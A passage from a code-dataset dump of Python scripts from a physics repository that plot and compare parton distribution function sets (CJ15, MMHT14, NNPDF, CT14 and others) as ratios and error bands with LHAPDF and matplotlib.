edgecolor='#FFFF00',\n alpha=1.0,hatch=None)\n\n # make legend\n if flav=='d':\n H_,L_ = ax.get_legend_handles_labels()\n H=[(p2,p1)]\n L=[tex('AV18')]\n for h in H_: H.append(h)\n for l in L_: L.append(l)\n ax.legend(H,L,loc=1,frameon=0,fontsize=8)\n\n # setup axis \n #if flav!='s' and flav!='g': ax.set_xticks([])\n ax.set_xlim(0.0,1.0)\n if flav=='dbub': ax.set_xlim(0.0,0.4)\n if flav=='ub' or flav=='db' or flav=='s' or flav=='g':\n ax.semilogx()\n ax.set_xlim(1e-3,1.0)\n\n ax.set_ylim(ymap[flav]['min'],ymap[flav]['max'])\n ax.set_xlabel('$x$',size=20)\n ax.set_ylabel(labmap[flav],size=20)\n\n # write info\n if flav=='u': \n ax.text(0.75,0.6,tex('CJ15'),\n transform=ax.transAxes,size=15)\n ax.text(0.06,0.15,'$Q^2=$'+tex('~10~GeV^2'),\n transform=ax.transAxes,size=12)\n\n#py.show()\npy.savefig('plots/CJ15fits.pdf')\n" }, { "alpha_fraction": 0.5071646571159363, "alphanum_fraction": 0.5695076584815979, "avg_line_length": 29.805438995361328, "blob_id": "749a118957031c1a2b6dced982da9866c799b3db", "content_id": "10058ad2971b330ebf82629df1f7d86f9d2fab50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14725, "license_type": "no_license", "max_line_length": 106, "num_lines": 478, "path": "/sharespace/codes/ratio.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('text',usetex=True)\n#params={'text.latex.preamble': \\\n# [r\"\\usepackage{upgreek}\",\n# r\"\\usepackage[nice]{units}\",\n# r\"\\usepackage{amstext}\"\n# ]}\n#py.rcParams.update(params)\n\nfrom master import COMPOSER,FITPACK,COMPOSER4NNPDF\n\n# plotting functions with LR capabilities\n\ndef get_LR(gsL,gsR):\n # construct (L)eft panel\n axL=py.subplot(gsL)\n axL.spines['right'].set_visible(False)\n axL.yaxis.set_ticks_position('left')\n axL.axvline(0.1,color='k',ls='--',alpha=0.5)\n \n # construct (R)ight panel\n axR=py.subplot(gsR)\n axR.spines['left'].set_visible(False)\n axR.axes.yaxis.set_ticklabels([])\n axR.axes.get_yaxis().set_ticks([])\n return [axL,axR]\n\ndef plotI(AX,Q2,central,other,flav,color,ls,T=1,hatch=None,alpha=0.4,facecolor='none',edgecolor='none'):\n \"\"\"\n This routine plots a ratio band of 'other' to 'central' using the error from 'other'\n \"\"\"\n\n axL,axR=AX[flav]\n XL=10**np.linspace(-4,-1,100)\n if flav=='u' or flav=='d' or flav=='g':\n XR=np.linspace(0.1,0.95,100)\n else:\n XR=np.linspace(0.1,0.5,100)\n LC=central.get_xpdf(flav,X=XL,Q2=Q2)\n RC=central.get_xpdf(flav,X=XR,Q2=Q2)\n LO=other.get_xpdf(flav,X=XL,Q2=Q2)\n RO=other.get_xpdf(flav,X=XR,Q2=Q2)\n\n axL.plot(XL,LO['xf0']/LC['xf0'],color=color,ls=ls)\n p1,=axR.plot(XR,RO['xf0']/RC['xf0'],color=color,ls=ls,label=flav)\n\n fill_between(XL,\n (LO['xf0']-LO['dxf-']*T)/LC['xf0'],\n (LO['xf0']+LO['dxf+']*T)/LC['xf0'],\n ax=axL,\n facecolor=facecolor,\n edgecolor=edgecolor,\n alpha=alpha,\n hatch=hatch)\n p2=fill_between(XR,\n (RO['xf0']-RO['dxf-']*T)/RC['xf0'],\n (RO['xf0']+RO['dxf+']*T)/RC['xf0'],\n ax=axR,\n facecolor=facecolor,\n edgecolor=edgecolor,\n alpha=alpha,\n hatch=hatch)\n\n axL.set_xlim(np.amin(XL),0.1)\n axR.set_xlim(0.1,np.amax(XR))\n return (p2,p1)\n\ndef plotII(AX,Q2,central,other,flav,color,ls,T=1,hatch=None,alpha=0.4,facecolor='none',edgecolor='none'):\n 
\"\"\"\n This routine plots a ratio (only central) of 'other' to 'central' using the error from 'other'\n \"\"\"\n\n axL,axR=AX[flav]\n XL=10**np.linspace(-4,-1,100)\n if flav=='u' or flav=='d' or flav=='g':\n XR=np.linspace(0.1,0.95,100)\n else:\n XR=np.linspace(0.1,0.5,100)\n LC=central.get_xpdf(flav,X=XL,Q2=Q2)\n RC=central.get_xpdf(flav,X=XR,Q2=Q2)\n LO=other.get_xpdf(flav,X=XL,Q2=Q2)\n RO=other.get_xpdf(flav,X=XR,Q2=Q2)\n\n axL.plot(XL,LO['xf0']/LC['xf0'],color=color,ls=ls)\n p1,=axR.plot(XR,RO['xf0']/RC['xf0'],color=color,ls=ls,label=flav)\n\n axL.set_xlim(np.amin(XL),0.1)\n axR.set_xlim(0.1,np.amax(XR))\n return p1\n\n# ploting function without LR \n\ndef plotI0(AX,Q2,central,other,flav,color,ls,T=1,hatch=None,alpha=0.4,facecolor='none',edgecolor='none'):\n \"\"\"\n This routine plots a ratio band of 'other' to 'central' \n using the error from 'other'\n \"\"\"\n\n ax=AX[flav]\n if flav=='u' or flav=='d' or flav=='g':\n X=np.linspace(1e-4,0.95,100)\n else:\n X=np.linspace(1e-4,0.5,100)\n C=central.get_xpdf(flav,X=X,Q2=Q2)\n O=other.get_xpdf(flav,X=X,Q2=Q2)\n\n ax.plot(X,O['xf0']/C['xf0'],color=color,ls=ls)\n p1,=ax.plot(X,O['xf0']/C['xf0'],color=color,ls=ls,label=flav)\n\n p2=fill_between(X,\n (O['xf0']-O['dxf-']*T)/C['xf0'],\n (O['xf0']+O['dxf+']*T)/C['xf0'],\n ax=ax,\n facecolor=facecolor,\n edgecolor=edgecolor,\n alpha=alpha,\n hatch=hatch)\n return (p2,p1)\n\ndef plotII0(AX,Q2,central,other,flav,color,ls,T=1,hatch=None,alpha=0.4,facecolor='none',edgecolor='none'):\n \"\"\"\n This routine plots a ratio (only central) of \n 'other' to 'central' using the error from 'other'\n \"\"\"\n\n ax=AX[flav]\n if flav=='u' or flav=='d' or flav=='g':\n X=np.linspace(1e-4,0.95,100)\n else:\n X=np.linspace(1e-4,0.5,100)\n C=central.get_xpdf(flav,X=X,Q2=Q2)\n O=other.get_xpdf(flav,X=X,Q2=Q2)\n\n ax.plot(X,O['xf0']/C['xf0'],color=color,ls=ls)\n p1,=ax.plot(X,O['xf0']/C['xf0'],color=color,ls=ls,label=flav)\n return p1\n\n# main routines\n\ndef ratio():\n\n ###############################\n # plot geometry\n ###############################\n # set gloabl figure dimensions\n nrows=3\n ncols=2\n py.figure(figsize=(ncols*4,nrows*3))\n\n # construct LR AXs for each flav \n AX={}\n\n # left side LR panels\n gs = gridspec.GridSpec(nrows,ncols)\n gs.update(left=0.1,right=0.48,wspace=0,hspace=0.3,\\\n top=0.98,bottom=0.05)\n AX['u'] =get_LR(gs[0,0],gs[0,1])\n AX['ub']=get_LR(gs[1,0],gs[1,1])\n AX['s'] =get_LR(gs[2,0],gs[2,1])\n\n # right side LR panels\n gs = gridspec.GridSpec(nrows,ncols)\n gs.update(left=0.58,right=0.98,wspace=0,hspace=0.3,\\\n top=0.98,bottom=0.05)\n AX['d'] =get_LR(gs[0,0],gs[0,1])\n AX['db']=get_LR(gs[1,0],gs[1,1])\n AX['g'] =get_LR(gs[2,0],gs[2,1])\n\n \n ###############################\n # plot content \n ###############################\n # initialize composer for each pdf set\n CJ=COMPOSER('CJ15_NLO_KP_AV18')\n HERA15=COMPOSER('HERAPDF15NLO_EIG')\n MMHT14=COMPOSER('MMHT2014nlo68cl')\n NNPDF=COMPOSER4NNPDF('NNPDF30_nlo_as_0118')\n #CT10=COMPOSER('CT10nlo')\n \n Q2=10\n for flav in ['u','d','ub','db','s','g']:\n print 'plotting '+flav\n\n # the output of plot used to construct specialized \n # legend marker\n p1=plotI(AX,Q2,CJ,CJ,flav,'yellow','-',T=10,\\\n hatch=None,alpha=0.4,facecolor='yellow',edgecolor='yellow')\n p2=plotI(AX,Q2,CJ,CJ,flav,'r','-',T=1,\\\n hatch=None,alpha=1.0,facecolor='r',edgecolor='none')\n p3=plotI(AX,Q2,CJ,MMHT14,flav,'b','-',T=1,\\\n hatch='...',alpha=0.4,facecolor='none',edgecolor='b')\n p4=plotI(AX,Q2,CJ,HERA15,flav,'g','-',T=1,\\\n 
hatch='...',alpha=0.4,facecolor='none',edgecolor='g')\n p5=plotI(AX,Q2,CJ,NNPDF,flav,'m','-',T=1,\\\n hatch='...',alpha=0.4,facecolor='none',edgecolor='m')\n #p5=plotI(AX,Q2,CJ,CT10,flav,'k','-',T=1,\\\n # hatch='\\\\',alpha=0.4,facecolor='none',edgecolor='k')\n \n\n# print single PDF as a function of x (grafted onto ratio.py code)\n if flav=='db':\n X=np.linspace(0.01,1.0,100) \n mm=MMHT14.get_xpdf(flav,X=X,Q2=4.0)\n t=1\n for i in range(X.size):\n l='%0.2f %0.2e %0.2e %0.2e' \n print l%(X[i],X[i]*mm['xf0'][i],X[i]*mm['dxf-'][i]*t,X[i]*mm['dxf+'][i]*t)\n #l='%0.2f %0.2e %0.2e'\n #print l%(X[i],X[i]*mm['xf0'][i],X[i]*mm['dxf'][i]*t)\n ax=py.subplot(111)\n ax.plot(X,X*mm['xf0'],'r-')\n ax.plot(X,X*mm['xf0']-X*mm['dxf-']*t,'r:')\n ax.plot(X,X*mm['xf0']+X*mm['dxf+']*t,'r:')\n #ax.plot(X,X*mm['xf0']-mm['dxf']*t,'r:')\n #ax.plot(X,X*mm['xf0']+mm['dxf']*t,'r:') \n py.show()\n sys.exit()\n\n\n\n #retrieve LR ax for further proccesing \n axL,axR=AX[flav]\n\n # plot specialized legend marker at the specific flav panel\n if flav=='d':\n H=[p1,p2,p3,p4,p5]\n L=[tex('CJ15')+'\\ ($T=10$)'\\\n ,tex('CJ15')+'\\ ($T=1$)'\\\n ,tex('MMHT14')\\\n ,tex('HERA15')\\\n ,tex('NNPDF3.0')]\n # ,tex('CT10')]\n axR.legend(H,L,frameon=0,fontsize=11,\\\n bbox_to_anchor=(0.05, 1.0))\n if flav=='u':\n axR.text(0.1,0.85,'$Q^2=%0.0f$'%(Q2)+tex('~GeV^2'),\\\n transform=axL.transAxes,size=15)\n\n # plot some text at specific flav panel\n #if flav=='d':\n # axL.text(0.06,0.1,'$T=10$',transform=axL.transAxes,size=20)\n\n # set ylims\n if flav=='u':\n ymin,ymax=0.795,1.205\n if flav=='d':\n ymin,ymax=0.6,1.7\n if flav=='s':\n ymin,ymax=0.6,1.9\n if flav=='g' or flav=='ub' or flav=='db':\n ymin,ymax=0.7,1.3\n #axL.set_yticks(np.arange(0.2,2.0,0.4))\n axL.set_ylim(ymin,ymax)\n axR.set_ylim(ymin,ymax)\n\n # set x axis\n axL.semilogx()\n axL.set_xticks(10**np.linspace(-4,-2,3))\n if flav=='u' or flav=='d':\n axR.set_xticks(np.arange(0.1,1.1,0.2))\n axR.set_xlim(0.1,0.95)\n else:\n axR.set_xticks(np.arange(0.1,0.4,0.1))\n axR.set_xlim(0.1,0.4)\n\n # set labels\n if flav=='db': _flav=r'\\bar{d}'\n elif flav=='ub': _flav=r'\\bar{u}'\n else: _flav=flav\n axL.set_ylabel(r'$%s/%s$\\large$_{\\rm CJ15}$'%(_flav,_flav),size=20)\n axL.set_xlabel('$x$',size=20)\n axL.xaxis.set_label_coords(1.0,-0.08,transform=axL.transAxes)\n\n py.savefig('gallery/ratio.pdf')\n\ndef ratio_wfn():\n\n ###############################\n # plot geometry\n ###############################\n # set gloabl figure dimensions\n nrows=3\n ncols=2\n py.figure(figsize=(ncols*4,nrows*3))\n\n # construct LR AXs for each flav \n AX={}\n gs = gridspec.GridSpec(nrows,ncols)\n gs.update(left=0.1,right=0.98,wspace=0.3,hspace=0.3,top=0.98,bottom=0.08)\n AX['u'] =py.subplot(gs[0,0]) \n AX['ub']=py.subplot(gs[1,0])\n AX['s'] =py.subplot(gs[2,0])\n AX['d'] =py.subplot(gs[0,1])\n AX['db']=py.subplot(gs[1,1])\n AX['g'] =py.subplot(gs[2,1])\n\n\n ###############################\n # plot content \n ###############################\n\n CJ15={'KP':{},'fmKP':{}}\n CJ15['KP']['AV18' ] =COMPOSER('CJ15_NLO_KP_AV18')\n CJ15['KP']['CDBONN'] =COMPOSER('CJ15_NLO_KP_CDBONN',central_only=True)\n CJ15['KP']['WJC1' ] =COMPOSER('CJ15_NLO_KP_WJC1',central_only=True)\n CJ15['KP']['WJC2' ] =COMPOSER('CJ15_NLO_KP_WJC2',central_only=True)\n CJ15['fmKP']['AV18'] =COMPOSER('CJ15_NLO_fmKP_AV18',central_only=True)\n CJ15['fmKP']['CDBONN']=COMPOSER('CJ15_NLO_fmKP_CDBONN',central_only=True)\n CJ15['fmKP']['WJC1'] =COMPOSER('CJ15_NLO_fmKP_WJC1',central_only=True)\n CJ15['fmKP']['WJC2'] 
=COMPOSER('CJ15_NLO_fmKP_WJC2',central_only=True)\n \n Q2=10\n for flav in ['u','d','ub','db','s','g']:\n print flav\n p1=plotI0(AX,Q2,CJ15['KP']['AV18'],CJ15['KP']['AV18'],flav,'yellow','-',\n T=1,hatch=None,alpha=0.4,facecolor='yellow',edgecolor='none')\n p2=plotII0(AX,Q2,CJ15['KP']['AV18'],CJ15['KP']['CDBONN'],flav,'r','-',\n T=1,hatch=None,alpha=0.4,facecolor='b',edgecolor='none')\n p3=plotII0(AX,Q2,CJ15['KP']['AV18'],CJ15['KP']['WJC1'],flav,'g','--',\n T=1,hatch=None,alpha=0.4,facecolor='g',edgecolor='none')\n p4=plotII0(AX,Q2,CJ15['KP']['AV18'],CJ15['KP']['WJC2'],flav,'b','-',\n T=1,hatch=None,alpha=0.4,facecolor='y',edgecolor='none')\n \n ax=AX[flav]\n\n if flav=='u':\n H=[p1,p2,p3,p4]\n L=[tex('CJ15\\ (AV18)')+r'$\\ \\ \\ T=1$',tex('CDBonn'),tex('WJC1'),tex('WJC2')]\n ax.legend(H,L,frameon=0,fontsize=10, bbox_to_anchor=(0.65, 1.0))\n ax.text(0.06,0.1,'$Q^2=%0.0f$'%(Q2)+tex('~GeV^2'),\\\n transform=ax.transAxes,size=15)\n\n # set ylims\n if flav=='d':\n ymin,ymax=0.85,1.15\n elif flav=='u':\n ymin,ymax=0.95,1.05\n elif flav=='g':\n ymin,ymax=0.9,1.1\n else:\n ymin,ymax=0.95,1.05\n ax.set_ylim(ymin,ymax)\n\n # set x axis\n if flav=='u' or flav=='d' or flav=='g':\n #ax.set_xticks(np.arange(0.1,1.1,0.2))\n ax.set_xlim(0,0.95)\n elif flav=='g':\n ax.set_xlim(0,0.8)\n else:\n #ax.set_xticks(np.arange(0.1,0.5,0.1))\n ax.set_xlim(0,0.5)\n\n # set labels\n if flav=='db': _flav=r'\\bar{d}'\n elif flav=='ub': _flav=r'\\bar{u}'\n else: _flav=flav\n ax.set_ylabel(r'$%s/%s$\\large$_{\\rm CJ15}$'%(_flav,_flav),size=20)\n ax.set_xlabel('$x$',size=20)\n if flav=='u' or flav=='d' or flav=='g':\n xticklabels=[0,0.2,0.4,0.6,0.8]\n \n py.savefig('gallery/ratio_wfn.pdf')\n\ndef ratio_off():\n\n ###############################\n # plot geometry\n ###############################\n # set gloabl figure dimensions\n nrows=3\n ncols=2\n py.figure(figsize=(ncols*4,nrows*3))\n\n # construct LR AXs for each flav \n AX={}\n gs = gridspec.GridSpec(nrows,ncols)\n gs.update(left=0.1,right=0.98,wspace=0.3,hspace=0.3,top=0.98,bottom=0.08)\n AX['u'] =py.subplot(gs[0,0]) \n AX['ub']=py.subplot(gs[1,0])\n AX['s'] =py.subplot(gs[2,0])\n AX['d'] =py.subplot(gs[0,1])\n AX['db']=py.subplot(gs[1,1])\n AX['g'] =py.subplot(gs[2,1])\n\n\n ###############################\n # plot content \n ###############################\n \n CJ15={'KP':{},'fmKP':{}}\n CJ15['KP']['AV18' ] =COMPOSER('CJ15_NLO_KP_AV18')\n CJ15['KP']['CDBONN'] =COMPOSER('CJ15_NLO_KP_CDBONN',central_only=True)\n CJ15['KP']['WJC1' ] =COMPOSER('CJ15_NLO_KP_WJC1',central_only=True)\n CJ15['KP']['WJC2' ] =COMPOSER('CJ15_NLO_KP_WJC2',central_only=True)\n CJ15['fmKP']['AV18'] =COMPOSER('CJ15_NLO_fmKP_AV18',central_only=True)\n CJ15['fmKP']['CDBONN']=COMPOSER('CJ15_NLO_fmKP_CDBONN',central_only=True)\n CJ15['fmKP']['WJC1'] =COMPOSER('CJ15_NLO_fmKP_WJC1',central_only=True)\n CJ15['fmKP']['WJC2'] =COMPOSER('CJ15_NLO_fmKP_WJC2',central_only=True)\n \n Q2=10\n for flav in [ 'u','d','ub','db','s','g']:\n print flav\n p1=plotI0(AX,Q2,CJ15['KP']['AV18'],CJ15['KP']['AV18'],flav,'y','-',\n T=1,hatch=None,alpha=0.4,facecolor='yellow',edgecolor='none')\n p2=plotII0(AX,Q2,CJ15['KP']['AV18'],CJ15['fmKP']['AV18'],flav,'k',':',\n T=1,hatch=None,alpha=0.4,facecolor='k',edgecolor='none')\n p3=plotII0(AX,Q2,CJ15['KP']['AV18'],CJ15['fmKP']['CDBONN'],flav,'r','-',\n T=1,hatch=None,alpha=0.4,facecolor='b',edgecolor='none')\n p4=plotII0(AX,Q2,CJ15['KP']['AV18'],CJ15['fmKP']['WJC1'],flav,'g','--',\n T=1,hatch=None,alpha=0.4,facecolor='g',edgecolor='none')\n 
p5=plotII0(AX,Q2,CJ15['KP']['AV18'],CJ15['fmKP']['WJC2'],flav,'b','-',\n T=1,hatch=None,alpha=0.4,facecolor='y',edgecolor='none')\n \n ax=AX[flav]\n\n if flav=='d':\n H=[p1,p2,p3,p4,p5]\n L=[tex('CJ15\\ (AV18)'),tex('AV18+OCS'),tex('CDBonn+OCS'),tex('WJC1+OCS'),tex('WJC2+OCS')]\n ax.legend(H,L,frameon=0,fontsize=10, bbox_to_anchor=(0.55, 0.55))\n if flav=='u':\n ax.text(0.06,0.85,'$Q^2=%0.0f$'%(Q2)+tex('~GeV^2'),\\\n transform=ax.transAxes,size=15)\n\n # set ylims\n if flav=='d':\n ymin,ymax=0.8,1.1\n elif flav=='u':\n ymin,ymax=0.95,1.05\n elif flav=='g':\n ymin,ymax=0.9,1.1\n else:\n ymin,ymax=0.95,1.05\n ax.set_ylim(ymin,ymax)\n\n # set x axis\n if flav=='u' or flav=='d' or flav=='g':\n #ax.set_xticks(np.arange(0.1,1.1,0.2))\n ax.set_xlim(0,0.95)\n elif flav=='g':\n ax.set_xlim(0,0.8)\n else:\n #ax.set_xticks(np.arange(0.1,0.5,0.1))\n ax.set_xlim(0,0.5)\n\n # set labels\n if flav=='db': _flav=r'\\bar{d}'\n elif flav=='ub': _flav=r'\\bar{u}'\n else: _flav=flav\n ax.set_ylabel(r'$%s/%s$\\large$_{\\rm CJ15}$'%(_flav,_flav),size=20)\n ax.set_xlabel('$x$',size=20)\n if flav=='u' or flav=='d' or flav=='g':\n xticklabels=[0,0.2,0.4,0.6,0.8]\n \n # set labels\n if flav=='db': _flav=r'\\bar{d}'\n elif flav=='ub': _flav=r'\\bar{u}'\n else: _flav=flav\n ax.set_ylabel(r'$%s/%s$\\large$_{\\rm CJ15}$'%(_flav,_flav),size=20)\n ax.set_xlabel('$x$',size=20)\n \n py.savefig('gallery/ratio_off.pdf')\n\n\nif __name__=='__main__':\n ratio()\n #ratio_wfn()\n #ratio_off()\n" }, { "alpha_fraction": 0.6143518686294556, "alphanum_fraction": 0.6796296238899231, "avg_line_length": 34.40983581542969, "blob_id": "e36e1114279858ef8effd90a4de028e021ba0f1e", "content_id": "b959bf23fa0b27a25a7c0ed6e4b3f4b0500483c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2160, "license_type": "no_license", "max_line_length": 103, "num_lines": 61, "path": "/sharespace/codes/dou.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Times-Roman']})\nrc('text',usetex=True)\nfrom master import COMPOSER,FITPACK,COMPOSER4NNPDF\n\ndef plot_dou(ax,com,Q2,X,color,ls='-',T=1,hatch=None,alpha=0.4,facecolor='none',edgecolor='none'):\n dou=com.get_dou(X=X,Q2=Q2)\n #ax.plot(X,dou['central'],color=color,ls=ls)\n #p1,=ax.plot(X,dou['central'],color=color,ls=ls)\n p2=fill_between(X,\n (dou['central']-dou['asym err -']*T),\n (dou['central']+dou['asym err +']*T),\n ax=ax,\n facecolor=facecolor,\n edgecolor=edgecolor,\n alpha=alpha,\n hatch=hatch)\n #return (p2,p1)\n return 
p2\n\nCJ15=COMPOSER('CJ15_NLO_KP_AV18')\nMMHT14=COMPOSER('MMHT2014nlo68cl')\nJR14=COMPOSER('JR14NLO08VF')\nCT14=COMPOSER('CT14nlo')\n#NNPDF=COMPOSER4NNPDF('NNPDF30_nlo_as_0118')\n#ABM11=COMPOSER('abm11_4n_nlo')\n#HERA15=COMPOSER('HERAPDF15NLO_EIG')\n\nax=py.subplot(111)\nQ2=10\nX=np.linspace(1e-3,0.95,1000)\n\nct=plot_dou(ax,CT14,Q2,X,color='g',ls='-',T=1,hatch=None,alpha=0.7,facecolor='g',edgecolor='g')\nmmht=plot_dou(ax,MMHT14,Q2,X,color='y',ls='-',T=1,hatch=None,alpha=0.8,facecolor='y',edgecolor='y')\njr=plot_dou(ax,JR14,Q2,X,color='b',ls='-',T=10,hatch='..',alpha=0.7,facecolor='none',edgecolor='b')\ncj=plot_dou(ax,CJ15,Q2,X,color='r',ls='-',T=10,hatch=None,alpha=0.8,facecolor='r',edgecolor='r')\n#hera=plot_dou(ax,HERA15,Q2,X,color='k',ls='-',T=1,hatch='||',alpha=1.0,facecolor='none',edgecolor='k')\n#nnpdf=plot_dou(ax,NNPDF,Q2,X,color='k',ls='-',T=1,hatch='//',alpha=0.4,edgecolor='k')\n#abm=plot_dou(ax,ABM11,Q2,X,color='b',ls='-',T=10,hatch='...',alpha=0.7,facecolor='none',edgecolor='b')\n\n\n# legend\nH=[cj,mmht,ct,jr]\nL=[tex('CJ15'),tex('MMHT14'),tex('CT14'),tex('JR14')]\nax.legend(H,L,frameon=0,fontsize=20,loc=3,bbox_to_anchor=(0.5,0.57))\nax.set_ylabel(r'$d/u$',size=25)\nax.set_xlabel(r'$x$',size=25)\nax.set_xlim(0,0.95)\nax.set_ylim(0,1)\nax.tick_params(axis='both',labelsize=20)\npy.tight_layout()\npy.savefig('gallery/du0.pdf')\n" }, { "alpha_fraction": 0.5164535641670227, "alphanum_fraction": 0.5789142847061157, "avg_line_length": 25.214284896850586, "blob_id": "451f790370c49702a926444bb1693709a923c532", "content_id": "4aef2e0529addf0d406bc589e94b9ae8f5b88d22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4771, "license_type": "no_license", "max_line_length": 82, "num_lines": 182, "path": "/sharespace/codes/other/NLO.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('text',usetex=True)\nfrom master import FITPACK\n\n\n# initialize PDF instances\nHERA15 =lhapdf.mkPDFs('HERAPDF15NLO_EIG')\nMMHT14 =lhapdf.mkPDFs('MMHT2014nlo68cl')\n#MSTW08 =lhapdf.mkPDFs('MSTW2008nlo68cl')\nJR14 =lhapdf.mkPDFs('JR14NLO08VF')\nCJ12min=lhapdf.mkPDFs('CJ12min')\nCT10 =lhapdf.mkPDFs('CT10nlo')\n\n# dictionary for PDG flav index\npdgmap= {'u':2,'d':1,'ub':-2,'db': -1,'s':3,'g':21}\n\n# function to access LHAPDF pdfs\ndef get_pdfs(flav,x,Q2,iset,grp):\n\n if flav!='du' and flav!='dbub': \n return grp[iset].xfxQ2(pdgmap[flav],x,Q2)\n\n elif flav=='du':\n\n if grp[iset].xfxQ2(pdgmap['u'],x,Q2)!=0.0:\n return grp[iset].xfxQ2(pdgmap['d'],x,Q2)/grp[iset].xfxQ2(pdgmap['u'],x,Q2)\n else:\n return 0.0\n\n elif flav=='dbub':\n\n if grp[iset].xfxQ2(pdgmap['ub'],x,Q2)!=0.0:\n return grp[iset].xfxQ2(pdgmap['db'],x,Q2)/grp[iset].xfxQ2(pdgmap['ub'],x,Q2)\n else:\n return 0.0\n\n else:\n print '*** ERROR: flav not defined ***'\n sys.exit()\n\n\n# load CJ15 from fitpack data \nCJ15 = {}\nCJ15['CJ15_AV18'] = FITPACK().get_PDFs('data/CJ15_NLO_KP_AV18.pdf')\n\n# dictionary for labels\nlabmap = {}\nlabmap['u'] = '$xu$'\nlabmap['d'] = '$xd$'\nlabmap['ub'] = r'$x\\bar{u}$'\nlabmap['db'] = r'$x\\bar{d}$'\nlabmap['s'] = '$xs$'\nlabmap['g'] = '$xg$'\nlabmap['du'] = '$d/u$'\nlabmap['dbub'] = r'$\\bar{d}/\\bar{u}$'\n\n# dictionary for grp == 
groups \ngrpmap = {}\ngrpmap['HERA15'] = {'grp':HERA15,'color':'g--'}\ngrpmap['JR14'] = {'grp':JR14,'color':'g-'}\ngrpmap['MMHT14'] = {'grp':MMHT14,'color':'b-'}\n#grpmap['MSTW08'] = {'grp':MSTW08,'color':'b:'}\ngrpmap['CJ12min']= {'grp':CJ12min,'color':'k-.'}\ngrpmap['CT10'] = {'grp':CT10,'color':'r-.'}\n\n# dictionary for ylims \nymap = {}\nymap['u'] ={'min':0.0,'max':0.8}\nymap['d'] ={'min':0.0,'max':0.8}\nymap['du'] ={'min':0.0,'max':1.0}\nymap['dbub']={'min':0.6,'max':2.0}\nymap['ub']={'min':0.0,'max':0.6}\nymap['db']={'min':0.0,'max':0.6}\nymap['s'] ={'min':0.0,'max':0.6}\nymap['g'] ={'min':0.0,'max':10.0}\n\n# dictionary for plot location\nncols=2\nnrows=4\n\npy.figure(figsize=(ncols*4,nrows*2)) \ngs = gridspec.GridSpec(4,2) # specify plotting grid geometry\ngs.update(left=0.1,right=0.98,wspace=0.25,hspace=0.45,top=0.98,bottom=0.1)\ngrid = {}\ngrid['u'] = gs[0,0]\ngrid['d'] = gs[0,1]\ngrid['du'] = gs[1,0]\ngrid['dbub']= gs[1,1]\ngrid['ub']= gs[2,0]\ngrid['db']= gs[2,1]\ngrid['s'] = gs[3,0]\ngrid['g'] = gs[3,1]\n\n\n# setup kinematics\nQ2=10.0\niset=0\n\n\n# make plot\nfor flav in ['u','d','ub','db','s','g','du','dbub']:\n\n ax=py.subplot(grid[flav])\n\n for grp in ['CJ15','HERA15','MMHT14','JR14','CT10','CJ12min']:\n\n if grp=='CJ15':\n cj15 = CJ15['CJ15_AV18']\n X=cj15['Q2'][Q2]['x']\n if flav!='du' and flav!='dbub':\n central=cj15['Q2'][Q2]['x'+flav]\n error=cj15['Q2'][Q2]['err-x'+flav]*10\n elif flav=='du':\n central=cj15['Q2'][Q2]['d/u']\n error=cj15['Q2'][Q2]['err-d/u']*10\n elif flav=='dbub':\n central=cj15['Q2'][Q2]['db/ub']\n error=cj15['Q2'][Q2]['err-db/ub']*10\n\n #args={} \n #args['ax']=ax\n #args['x']=X\n #args['central']=central\n #args['lower']=central-error\n #args['upper']=central+error\n #args['central color']='r'\n #args['central line style']='-'\n #args['band color']='#FFFF00'\n #args['label']=tex(grp)\n #CJ_Legend = plot_band(args)\n p1,=ax.plot(X,central,'r-')\n p2=fill_between(X,central-error,central+error,ax=ax,\n facecolor='#FFFF00',\n edgecolor='#FFFF00',\n alpha=1.0,hatch=None)\n\n else:\n X=np.linspace(1e-3,0.95,1000)\n grp_=grpmap[grp]['grp']\n col=grpmap[grp]['color']\n ax.plot(X,[get_pdfs(flav,x,Q2,iset,grp_) for x in X],col,label=tex(grp))\n\n # make legend\n if flav=='d':\n H_,L_ = ax.get_legend_handles_labels()\n H=[(p2,p1)]\n L=[tex('CJ15')]\n for h in H_: H.append(h)\n for l in L_: L.append(l)\n ax.legend(H,L,loc=1,frameon=0,fontsize=9)\n ax.text(0.07,0.15,tex('NLO'),transform=ax.transAxes,size=15)\n\n\n # setup axis \n #if flav!='s' and flav!='g': ax.set_xticks([])\n ax.set_xlim(0.0,1.0)\n if flav=='dbub': ax.set_xlim(0.0,0.4)\n if flav=='ub' or flav=='db' or flav=='s' or flav=='g':\n ax.semilogx()\n ax.set_xlim(1e-3,1.0)\n\n ax.set_ylim(ymap[flav]['min'],ymap[flav]['max'])\n ax.set_xlabel('$x$',size=20)\n ax.set_ylabel(labmap[flav],size=20)\n\n # write info\n if flav=='u': \n ax.text(0.55,0.75,'$Q^2=$'+tex('~10~GeV^2'),\n transform=ax.transAxes,size=12)\n\n#py.show()\npy.savefig('plots/NLOfits.pdf')\n" }, { "alpha_fraction": 0.5803738236427307, "alphanum_fraction": 0.6249220967292786, "avg_line_length": 30.165048599243164, "blob_id": "3526de93b07154939eb6bb094506ce202f739768", "content_id": "39f7188e21439a6a2409245c6b9bdd317497e019", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3210, "license_type": "no_license", 